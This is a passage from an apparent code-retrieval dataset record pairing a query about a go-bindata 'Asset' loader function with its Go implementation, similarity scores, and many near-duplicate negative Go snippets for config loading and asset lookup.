{\n\t\tpgPort = \"5432\"\n\t}\n\n\tpgUser, ok := os.LookupEnv(\"PG_USER\")\n\tif !ok {\n\t\tpgUser = \"postgres\"\n\t}\n\n\tpgPassword, ok := os.LookupEnv(\"PG_PASSWORD\")\n\tif !ok {\n\t\tpgPassword = \"\"\n\t}\n\n\tpgDBName, ok := os.LookupEnv(\"PG_DB_NAME\")\n\tif !ok {\n\t\tpgDBName = \"ginexamples\"\n\t}\n\n\tlogFile, ok := os.LookupEnv(\"LOGFILE\")\n\tif !ok {\n\t\tlogFile = \"\"\n\t}\n\n\treturn Config{\n\t\tPort: port,\n\t\tEnv: env,\n\t\tPGHost: pgHost,\n\t\tPGPort: pgPort,\n\t\tPGUser: pgUser,\n\t\tPGPassword: pgPassword,\n\t\tPGDBName: pgDBName,\n\t\tLogFile: logFile,\n\t}\n}", "func GetConfig() *Config {\n\tvar configPath string\n\tflag.StringVar(&configPath, \"config-path\", \"../configs/server.toml\", \"config file path\")\n\tflag.Parse()\n\tconfig := NewConfig()\n\t_, err := toml.DecodeFile(configPath, config)\n\tHandleError(err, ErrorFatal)\n\treturn config\n}", "func GetConfig(host string, verifyTLS bool, apiKey string, project string, config string) (models.ConfigInfo, Error) {\n\tvar params []queryParam\n\tparams = append(params, queryParam{Key: \"project\", Value: project})\n\tparams = append(params, queryParam{Key: \"config\", Value: config})\n\n\turl, err := generateURL(host, \"/v3/configs/config\", params)\n\tif err != nil {\n\t\treturn models.ConfigInfo{}, Error{Err: err, Message: \"Unable to generate url\"}\n\t}\n\n\tstatusCode, _, response, err := GetRequest(url, verifyTLS, apiKeyHeader(apiKey))\n\tif err != nil {\n\t\treturn models.ConfigInfo{}, Error{Err: err, Message: \"Unable to fetch configs\", Code: statusCode}\n\t}\n\n\tvar result map[string]interface{}\n\terr = json.Unmarshal(response, &result)\n\tif err != nil {\n\t\treturn models.ConfigInfo{}, Error{Err: err, Message: \"Unable to parse API response\", Code: statusCode}\n\t}\n\n\tconfigInfo, ok := result[\"config\"].(map[string]interface{})\n\tif !ok {\n\t\treturn models.ConfigInfo{}, Error{Err: fmt.Errorf(\"Unexpected type parsing config, expected map[string]interface{}, got %T\", result[\"config\"]), Message: \"Unable to parse API response\", Code: statusCode}\n\t}\n\tinfo := models.ParseConfigInfo(configInfo)\n\treturn info, Error{}\n}", "func Get() Config {\n\treturn c\n}", "func GetConfig() (Config, error) {\n\tconfig := Config{}\n\n\tif _, err := os.Stat(configPath); os.IsNotExist(err) {\n\t\treturn config, nil\n\t}\n\n\tcontent, err := ioutil.ReadFile(configPath)\n\tif err != nil {\n\t\treturn config, err\n\t}\n\n\tif err = json.Unmarshal(content, &config); err != nil {\n\t\treturn config, err\n\t}\n\n\treturn config, nil\n}" ]
[ "0.7490927", "0.746446", "0.736129", "0.73386055", "0.729168", "0.7282887", "0.7251122", "0.7225108", "0.718537", "0.71753985", "0.71724844", "0.71357465", "0.7128604", "0.71018463", "0.7094278", "0.7091888", "0.7080909", "0.7067862", "0.7066559", "0.7064386", "0.7062411", "0.70237935", "0.7006329", "0.70028895", "0.69645745", "0.6935908", "0.692971", "0.69202226", "0.6891645", "0.6889001", "0.68764055", "0.68711704", "0.68655", "0.6857415", "0.6857403", "0.6835812", "0.6835812", "0.682271", "0.681843", "0.6816602", "0.67978466", "0.6793298", "0.67928207", "0.6776203", "0.6773327", "0.67719084", "0.6770364", "0.6767817", "0.6760719", "0.6750864", "0.67464465", "0.67404526", "0.6728699", "0.67271364", "0.67235476", "0.67229825", "0.67208725", "0.6699686", "0.66980726", "0.6693221", "0.6693221", "0.66896594", "0.66874695", "0.66762125", "0.66747344", "0.66712016", "0.6667648", "0.66553235", "0.6650333", "0.6644863", "0.66437256", "0.66425604", "0.66320336", "0.66220707", "0.66210884", "0.66159743", "0.66113704", "0.6610288", "0.6607761", "0.6604594", "0.6600862", "0.65988004", "0.65965307", "0.659502", "0.65775853", "0.65772355", "0.65677077", "0.65591514", "0.65537256", "0.65519583", "0.6547729", "0.6546077", "0.6542643", "0.6533529", "0.6520546", "0.65195316", "0.6518158", "0.6510167", "0.65061647", "0.6497685" ]
0.69321257
26
Asset loads and returns the asset for the given name. It returns an error if the asset could not be found or could not be loaded.
func Asset(name string) ([]byte, error) { if f, ok := _bindata[name]; ok { return f() } return nil, fmt.Errorf("Asset %s not found", name) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func Asset(name string) ([]byte, error) {\n cannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n if f, ok := _bindata[cannonicalName]; ok {\n a, err := f()\n if err != nil {\n return nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n }\n return a.bytes, nil\n }\n return nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func (model *GrogModel) GetAsset(name string) (*Asset, error) {\n\tvar foundAsset *Asset\n\tvar mimeType string\n\tvar content = make([]byte, 0)\n\tvar serveExternal int64\n\tvar rendered int64\n\tvar added int64\n\tvar modified int64\n\tvar err error\n\n\trow := model.db.DB.QueryRow(`select mimeType, content, serve_external, rendered,\n\t\tadded, modified from Assets where name = ?`, name)\n\tif row.Scan(&mimeType, &content, &serveExternal, &rendered, &added, &modified) != sql.ErrNoRows {\n\t\tfoundAsset = model.NewAsset(name, mimeType)\n\t\tfoundAsset.Content = content\n\t\tif serveExternal == 1 {\n\t\t\tfoundAsset.ServeExternal = true\n\t\t} else {\n\t\t\tfoundAsset.ServeExternal = false\n\t\t}\n\n\t\tif rendered == 1 {\n\t\t\tfoundAsset.Rendered = true\n\t\t} else {\n\t\t\tfoundAsset.Rendered = false\n\t\t}\n\n\t\tfoundAsset.Added.Set(time.Unix(added, 0))\n\t\tfoundAsset.Modified.Set(time.Unix(modified, 0))\n\t} else {\n\t\terr = fmt.Errorf(\"No asset with name %s\", name)\n\t}\n\n\treturn foundAsset, err\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcanonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[canonicalName]; ok {\n\t\ta, err := 